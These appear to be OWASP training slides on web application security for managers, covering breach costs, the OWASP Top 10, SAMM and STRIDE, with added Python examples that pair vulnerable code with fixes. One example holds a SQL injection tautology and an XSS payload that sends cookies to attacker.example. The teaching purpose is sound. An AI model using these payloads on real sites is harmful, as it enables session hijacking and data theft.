Security for Managers and Executives


Security for Managers and Executives
OWASP Education, Computer based training
Nishi Kumar, IT Architect Specialist, FIS; Chair, Software Security Forum at FIS; OWASP CBT Project Lead; OWASP Global Industry Committee; Nishi.Kumar@owasp.org
Contributor and Reviewer: Keith Turpin

Objectives
- Bring application security awareness
- Things we can do that will help build secure applications
- Processes we can have for achieving this goal
- Answer some common questions

How would you feel if your confidential data were stolen? Angry! Frustrated!

Identity Theft Phishing

Facebook Phishing Attack Lures people to a fake Facebook page and prompts them to log in. Unsuspecting Facebook users get a message from a friend urging them to "check this out" and including a link to a Web page that appears to be a Facebook log-in page.

Customer data breach: 77 million accounts compromised (potentially credit card numbers as well).

Why Should We Care? Let's just think this through...
How likely is a successful web application attack?
- Stunningly prevalent
- Easy to exploit without special tools or knowledge
- Little chance of being detected
- Hundreds of thousands of developers, a tiny fraction of them with security expertise
Consequences?
- Corruption or disclosure of database contents
- Root access to web and application servers
- Loss of authentication and access control for users
- Defacement
- Secondary attacks launched from your application

Cost of Non-Compliance
In the event of a breach the acquirer CAN make the merchant responsible for:
- Any fines from PCI-Co, up to $500,000 per incident
- Cost to notify victims
- Cost to replace cards (about $10/card)
- Cost of any fraudulent transactions
- Forensics from a QDSC
- Level 1 certification from a QDSC
The QDSC (Qualified Data Security Company) certification by Visa authorizes a company to perform level-one onsite assessments for merchants and service providers requiring a "Report on Compliance" (ROC).

Cost of Non-Compliance (cont.)
Example: 50,000 credit cards stolen
- PCI penalty: $100,000 per incident ($500,000 if you do not have a self-assessment)
- Card replacement: $500,000 (50,000 x $10 per card)
- Fraudulent transactions: $61,750,000 (50,000 x $1,235; $1,235 was the 2004 average fraudulent transaction)
- Bad publicity: priceless!

Why is Web Application Security Important? Attacks shift towards the application layer.
Where attacks happen versus where security dollars go (sources: Gartner, Watchfire):
- Web applications: 75% of attacks, 10% of security spending
- Network/server: 25% of attacks, 90% of security spending
2/3 of all web applications are vulnerable.

Problem Illustrated
Application layer:
- Attacker sends attacks inside valid HTTP requests
- Your custom code is tricked into doing something it should not
- Security requires software development expertise, not signatures
Network layer:
- Firewall, hardening, patching, IDS, and SSL cannot detect or stop attacks inside HTTP requests
- Security relies on signature databases
(Figure: "APPLICATION ATTACK" passing through Firewall, Hardened OS, Web Server, App Server and Custom Code into the business functions Accounts, Finance, Administration, Transactions, Communication, Knowledge Mgmt, E-Commerce, and the backends Databases, Legacy Systems, Web Services, Directories, Human Resrcs, Billing; a second Firewall and an Insider are also shown.)
Speaker notes: I wanted to illustrate here visually how the attack is happening. Attackers send an attack inside a valid HTTP request. Application code is tricked into doing something it was not supposed to do. Full application security requires specific software development expertise. Network layer security alone cannot stop attacks inside an HTTP request.

Demo Attack: Phases of a hacker attack

Phase 1 - Information Search: Fingerprinting
1. Hacker searches for information about the victim's target system: operating system, web server, database
2. Compares the information with a vulnerability database

Phase 1 - Information Search: SQL Injection
1. Hacker finds a vulnerability: searches for a (specific) user and finds additional information about that user
2. Needs this information for the next phase of the attack

Phase 2 - Infrastructure: Cross Site Scripting (XSS)
1. Hacker has found personal information about the user: e-mail, phone number, ...
2. Sends an e-mail with an unsuspicious topic
3. Includes XSS in the e-mail that sends the user's session to the hacker's server

Phase 2 - Infrastructure: Cross Site Scripting (XSS) (cont.)
1. User receives the e-mail
2. The e-mail is unsuspicious to the user: topic, originator
3. The included XSS sends all cookies to the hacker's web site

Phase 3 - Exploit: Session Hijacking
1. Hacker has received all cookies from the user
2. Cookies are used to identify users
3. Hacker uses the cookie to resume the user's session
4. Hacker is logged in as user "victim" with the user's access rights
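The three phases above, simulated offline as an added example (this is not code from the OWASP deck or from WebGoat). Phase 1 is the user search that builds SQL by string concatenation, beside the parameterized version; phase 2 is the page that reflects the search term unencoded, beside the HTML-encoded version; phase 3 models what an injected script can read from document.cookie when the session cookie does or does not carry the HttpOnly flag. The user table, the cookie name JSESSIONID, the attacker host attacker.example and the payload strings are all constructed for the example.

```python
import html
import re
import sqlite3

# Constructed attacker inputs for the example.
PAYLOAD_SQLI = "' OR '1'='1"   # tautology that makes the WHERE clause always true
PAYLOAD_XSS = ('<script>new Image().src='
               '"http://attacker.example/?c="+document.cookie</script>')


def make_db():
    """Constructed sample data: a tiny user table with three accounts."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, email TEXT, phone TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", [
        ("alice", "alice@example.com", "555-0100"),
        ("bob", "bob@example.com", "555-0101"),
        ("victim", "victim@example.com", "555-0102"),
    ])
    return conn


# Phase 1: the vulnerable "search for a user" feature. The input becomes SQL.
def find_user_vulnerable(conn, name):
    query = "SELECT username, email, phone FROM users WHERE username = '" + name + "'"
    return conn.execute(query).fetchall()


# Same feature with a bound parameter: the input stays data, never SQL.
def find_user_safe(conn, name):
    return conn.execute(
        "SELECT username, email, phone FROM users WHERE username = ?", (name,)
    ).fetchall()


# Phase 2: a results page that reflects the search term. Unencoded, the
# attacker's script tag lands in the page and runs in the victim's browser.
def render_vulnerable(term):
    return "<p>Results for: " + term + "</p>"


# HTML-encoding the untrusted value turns the payload into inert text.
def render_safe(term):
    return "<p>Results for: " + html.escape(term, quote=True) + "</p>"


def contains_script(page):
    """True if the rendered page still contains a live <script> tag."""
    return re.search(r"<script\b", page, re.IGNORECASE) is not None


# Phase 3: what the injected script can read. A browser never exposes
# HttpOnly cookies through document.cookie, so the session id stays hidden.
def set_cookie_header(session_id, http_only):
    flags = "; Secure; HttpOnly" if http_only else "; Secure"
    return "Set-Cookie: JSESSIONID=" + session_id + flags + "; Path=/"


def cookies_visible_to_script(set_cookie_headers):
    """Model document.cookie: return cookies not marked HttpOnly."""
    visible = []
    for hdr in set_cookie_headers:
        value = hdr.split(":", 1)[1].strip()
        attrs = [a.strip() for a in value.split(";")]
        if not any(a.lower() == "httponly" for a in attrs[1:]):
            visible.append(attrs[0])
    return visible


if __name__ == "__main__":
    db = make_db()
    print(find_user_vulnerable(db, PAYLOAD_SQLI))   # every user, phone numbers included
    print(find_user_safe(db, PAYLOAD_SQLI))         # []
    print(render_vulnerable(PAYLOAD_XSS))           # script tag survives
    print(render_safe(PAYLOAD_XSS))                 # &lt;script&gt;...
    print(cookies_visible_to_script([set_cookie_header("abc123", True)]))   # []
    print(cookies_visible_to_script([set_cookie_header("abc123", False)]))  # ['JSESSIONID=abc123']
```

The HttpOnly flag only blunts cookie theft; a tool such as XSS-Proxy (demoed later in this deck) drives the victim's browser from inside the vulnerable page and never needs the cookie value, so output encoding and parameterized queries are the fixes, and the cookie flag is defense in depth.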

That was just the beginning

Demo: Cross-site scripting with XSS-Proxy
XSS-Proxy is a tool for leveraging cross-site scripting (XSS) flaws to hijack victim browsers; it provides a bi-directional interactive control channel between the attacker, the victim browser and an XSS-vulnerable site. The demo uses the WebGoat XSS lesson.

Leverage OWASP for Web Application Security Training
The Open Web Application Security Project (OWASP Foundation Inc.)
- Participation in OWASP is free and open to all
- The vision is a software market that produces code that's secure
- The mission is to make security visible so that software buyers and sellers are on equal footing and market forces can work
- International not-for-profit charitable organization funded primarily by volunteers' time and OWASP memberships
http://www.owasp.org

What are the Top 10 Vulnerabilities? OWASP Top 10

Common Security Issues: The OWASP Top 10 2010
The ten most critical risks. Aimed to educate developers, architects and security practitioners about the consequences of the most common web application security risks. Living document: the 2010 Top 10 differs from the 2007 Top 10.

Users and Adopters
Payment Card Industry (PCI):
- PCI DSS Requirement 6.5 references the OWASP Guide (OWASP Top 10)
- PA-DSS Requirement 5.2 references the OWASP Guide (OWASP Top 10)
- Security code review for all custom code
OWASP Supporters

Educational Supporters

Common Security Issues: The OWASP Top 10 2010

Security Threats and OWASP T10
- Phishing: exploits weak authentication, authorization, session management and input validation (XSS, XFS) vulnerabilities
- Privacy violations: exploit poor input validation, business rule and weak authorization, injection flaws, and information leakage vulnerabilities
- Identity theft: exploits poor or non-existent cryptographic controls, malicious file execution, authentication, business rule and authorization check vulnerabilities

Security Threats and OWASP T10 (cont.)
- System compromise, data alteration or data destruction: exploit injection flaws and remote file inclusion/upload vulnerabilities
- Financial loss: exploits unauthorized transactions and CSRF attacks, broken authentication and session management, insecure object references, and weak authorization (forceful browsing) vulnerabilities
- Reputation loss: depends on any evidence (not necessarily exploitation) of a web application vulnerability

OWASP ESAPI (Enterprise Security API)
ESAPI sits between your custom enterprise web application and your existing enterprise services or libraries. Its components: Authenticator, User, AccessController, AccessReferenceMap, Validator, Encoder, HTTPUtilities, Encryptor, EncryptedProperties, Randomizer, Exception Handling, Logger, IntrusionDetector, SecurityConfiguration.
ESAPI Homepage: http://www.owasp.org/index.php/ESAPI

OWASP ESAPI 2.0 & OWASP Top 10 for 2010 mapping
Here is the mapping between the OWASP Top 10 for 2010 and ESAPI 2.0 components:
A1: Injection - Encoder
A2: Cross-Site Scripting (XSS) - Encoder, Validator
A3: Broken Authentication and Session Management - Authenticator, User, HTTPUtilities
A4: Insecure Direct Object References - AccessReferenceMap, AccessController
A5: Cross-Site Request Forgery (CSRF) - User (CSRF Token)
A6: Security Misconfiguration - SecurityConfiguration
A7: Insecure Cryptographic Storage - Encryptor
A8: Failure to Restrict URL Access - AccessController
A9: Insufficient Transport Layer Protection - HTTPUtilities
A10: Unvalidated Redirects and Forwards - AccessController
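Two of the mapped components, sketched in Python as an added example (this is not ESAPI code and does not follow ESAPI's Java API): IndirectReferenceMap plays the role of AccessReferenceMap for A4, handing the client random handles instead of raw account numbers, and the per-session CSRF token plays the role of the User's CSRF token for A5. The class and function names, the account ids and the two users are assumptions made for the example.

```python
import hmac
import secrets


class IndirectReferenceMap:
    """Per-session map between unguessable handles and real object ids.
    The client only ever sees the handle, so it cannot iterate account
    numbers or refer to an object it was never handed (the A4 problem)."""

    def __init__(self):
        self._to_direct = {}
        self._to_indirect = {}

    def add(self, direct):
        """Register a direct reference; returns the same handle if already mapped."""
        if direct in self._to_indirect:
            return self._to_indirect[direct]
        indirect = secrets.token_urlsafe(12)
        self._to_direct[indirect] = direct
        self._to_indirect[direct] = indirect
        return indirect

    def resolve(self, indirect):
        """Map a handle back to the direct reference; unknown handles are
        treated as an access-control violation, not a harmless miss."""
        try:
            return self._to_direct[indirect]
        except KeyError:
            raise PermissionError("unknown or forged object reference") from None


class Session:
    """Minimal session: owns the reference map and a CSRF token (assumed shape)."""

    def __init__(self, user, own_accounts):
        self.user = user
        self.refs = IndirectReferenceMap()
        self.csrf_token = secrets.token_hex(16)
        # Only this user's accounts are mapped, so a handle can resolve to nothing else.
        self.account_handles = [self.refs.add(acct) for acct in own_accounts]

    def check_csrf(self, submitted):
        # Constant-time comparison; a missing or empty token never matches.
        return bool(submitted) and hmac.compare_digest(self.csrf_token, submitted)


# Constructed sample data: two users, each with their own accounts.
ACCOUNTS = {"alice": ["ACC-1001", "ACC-1002"], "mallory": ["ACC-2001"]}


def transfer(session, form):
    """A state-changing request: needs a valid CSRF token and a handle this
    session issued. Returns the direct account id that would be debited."""
    if not session.check_csrf(form.get("csrf_token", "")):
        raise PermissionError("CSRF token missing or invalid")
    return session.refs.resolve(form["from_account"])


def _blocked(session, form):
    try:
        transfer(session, form)
        return False
    except PermissionError:
        return True


def demo():
    alice = Session("alice", ACCOUNTS["alice"])
    mallory = Session("mallory", ACCOUNTS["mallory"])
    # Legitimate request from Alice's own page carries her token and her handle.
    ok = transfer(alice, {"csrf_token": alice.csrf_token,
                          "from_account": alice.account_handles[0]})
    # Forged cross-site request riding Alice's session: no token.
    csrf_blocked = _blocked(alice, {"from_account": alice.account_handles[0]})
    # Raw account number supplied instead of a handle (direct object reference).
    idor_blocked = _blocked(alice, {"csrf_token": alice.csrf_token,
                                    "from_account": "ACC-1002"})
    # A handle issued to Mallory's session means nothing in Alice's session.
    cross_blocked = _blocked(alice, {"csrf_token": alice.csrf_token,
                                     "from_account": mallory.account_handles[0]})
    return ok, csrf_blocked, idor_blocked, cross_blocked


if __name__ == "__main__":
    print(demo())   # ('ACC-1001', True, True, True)
```

The map is deliberately per session and filled only with objects the user is authorized for, so resolve() doubles as the authorization check; a global map would only obscure identifiers without enforcing access control.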

OWASP Documentation on Web Application Security
- Application Security Desk Reference (ASDR): basic reference material on application security terminology
- Developer Guide: comprehensive guide for web application and web services security
- Secure Coding Practices: quick reference guide for secure coding practices
- Code Review Guide: comprehensive secure code review guide on the web
- Testing Guide: web application penetration testing
- ASVS: Application Security Verification Standard

OWASP Tools and Technology
- Automated security verification: vulnerability scanners, static analysis tools, fuzzing
- Manual security verification: penetration testing tools, code review tools
- Security architecture: ESAPI
- Secure coding: AppSec libraries, ESAPI reference implementation, guards and filters
- AppSec management: reporting tools
- AppSec education: CBT (computer based training), flawed apps, learning environments, Live CD

Web Testing Environment (Live CD)
A project that collects some of the best open source security projects in a single environment. Users can boot from the Live CD and immediately start using all the tools without any configuration. http://www.owasp.org/index.php/LiveCD

Web Testing Environment (Live CD)
Tools included on the Live CD: Burpsuite 1.3.03, Cal9000 2.0, Ende 1.0rc3, Fierce 1.0.3, Firefox 3.6, Grendel-scan 1.0, Httprint 301, Jbrofuzz 2.4, Maltego 3.0, Metasploit 3.5.1, Netcat 0.7.1, Nikto 2.1.2, Nmap 5.00, Paros 3.2.13, Ratproxy 1.58, Spikeproxy 1.4.8, Sqlbrute 1.0, Sqlmap 0.8, Tcpdump 4.0.0, w3af-svn 4041, wapiti 2.2.1-1, Webgoat 5.3-RC1, Webscarab 20090122, Webslayer-svn r4, Wireshark 1.2.7, Wsfuzzer 1.9.4, Zap 1.2.0.

Secure Coding Practices
The Secure Coding Practices Quick Reference Guide is a technology agnostic set of general software security coding practices, in a comprehensive checklist format, that can be integrated into the development lifecycle. It is designed to serve as a secure coding kick-start tool and easy reference, to help development teams quickly understand secure coding practices.

Training and Education
OWASP Education project: https://www.owasp.org/index.php/Category:OWASP_Education_Project
OWASP projects and resources you can use: https://www.owasp.org/index.php/London/Training/OWASP_projects_and_resources_you_can_use_TODAY

Training and Education (cont.)
OWASP CBT Project: https://www.owasp.org/index.php/Category:OWASP_CBT_Project

WebGoat: a classic vulnerable application to teach developers security code flaws

WebScarab - A Proxy Engine: a proxy tool to intercept HTTP requests and HTTP responses

Software Assurance Maturity Model (SAMM)
The four Disciplines are high-level categories for activities. Three security Functions under each Discipline are the specific silos for improvement within an organization.

Alignment & Governance: centered on the processes and activities for how an organization manages overall software development activities. This includes cross-cutting concerns on development and processes at the organization level.
- Education & Guidance: increasing security knowledge amongst personnel in software development through training and guidance on security topics relevant to individual job functions.
- Standards and Compliance: setting up a security and compliance control and audit framework throughout an organization to achieve increased assurance in software under construction and in operation.
- Strategic Planning: the overall strategic direction of the software assurance program and instrumentation of processes and activities to collect metrics about an organization's security posture.

Requirements & Design: in general, this includes product management, requirements gathering, high-level architecture specification, detailed design, and implementation.
- Threat Modeling: accurately identifying and characterizing potential attacks on software in order to better understand the risks and facilitate risk management.
- Security Requirements: promoting the inclusion of security-related requirements during the software development process in order to specify correct functionality from inception.
- Defensive Design (Secure Architecture): bolstering the design process with activities to promote secure-by-default designs and control over the technologies and frameworks upon which software is built.

Verification & Assessment: focused on the processes and activities for how we check and test artifacts produced throughout software development. This typically includes quality assurance work such as testing, but it can also include other review and evaluation activities.
- Architecture Review (Design Review): inspection of the artifacts created from the design process to ensure provision of adequate security mechanisms.
- Code Review: assessment of source code to aid vulnerability discovery and related mitigation activities, as well as to establish a baseline for secure coding expectations.
- Security Testing: testing software in its runtime environment in order to both discover vulnerabilities and establish a minimum standard for software releases.

Deployment & Operations: release management. This can involve shipping products to end users, deploying products to internal or external hosts, and normal operations of software in the runtime environment.
- Vulnerability Management: establishing consistent processes for managing internal and external vulnerability reports to limit exposure and gather data to enhance the security assurance program.
- Environment Hardening: implementing controls for the operating environment, such as web server and application server hardening.
- Operational Enablement: identifying and capturing the security-relevant information needed by an operator to properly configure, deploy, and run the software.

Software Assurance Maturity Model (SAMM) Check out this one...

SAMM: Conducting assessments
SAMM includes assessment worksheets for each Security Practice.

SAMM: Creating Scorecards
- Gap analysis: capturing scores from detailed assessments versus expected performance levels
- Demonstrating improvement: capturing scores from before and after an iteration of assurance program build-out
- Ongoing measurement: capturing scores over consistent time frames for an assurance program that is already in place

Process perspective: Build Security in the SDLC

Threat Modeling - an approach for analyzing the security of an application

Threat Categorization - STRIDE
Threats can be systematically identified in the application in a structured and repeatable manner:
- Spoofing
- Tampering
- Repudiation
- Information disclosure
- Denial of service
- Elevation of privilege

Threat Categorization (cont.)
Type | Example | Security Control
Spoofing | Illegally access and use another user's credentials | Authentication
Tampering | Maliciously change/modify persistent data, such as data in a database | Integrity
Repudiation | Perform illegal operations that cannot be traced | Non-repudiation
Information disclosure | Read a file that one was not granted access to, or read data in transit | Confidentiality
Denial of service | Deny access to valid users, such as making a web server temporarily unavailable or unusable | Availability
Elevation of privilege | Gain unauthorized access or compromise a system | Authorization

??? Since no customer is complaining, why does an organization need to fix security vulnerabilities in its applications?
- Compliance
- In case of a security breach: fines
- Reputation loss: priceless

??? What do we do if the application is already in production and has missed that phase of security?
It's never too late and never too early. It is a continuous process... Penetration testing and security code review are the key. We must fix security leaks and vulnerabilities.

??? What will help?
- Leverage OWASP
- Security code review: the value of mentoring is enormous
- Application scanning and code scanning using static analysis tools
- Make web application security part of the SDLC process
- Secure code development training
- Train QA to find security issues in the application

Make Security part of the SDLC process